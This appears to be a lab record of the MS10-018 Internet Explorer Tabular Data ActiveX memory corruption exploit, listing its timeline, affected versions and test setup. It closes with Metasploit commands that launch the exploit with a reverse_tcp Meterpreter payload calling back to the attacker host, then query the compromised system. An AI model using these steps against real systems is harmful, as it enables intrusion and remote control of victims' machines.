Timeline :
Vulnerability privately disclosed to Microsoft by ZDI on 2009-10-20
Microsoft patch “KB980182” released on 2010-03-30
Metasploit PoC provided by jduck on 2010-04-05
PoC provided by :
Anonymous
jduck
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB980182
Description :
This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that versions 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.
Commands :
use windows/browser/ms10_018_ie_tabular_activex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig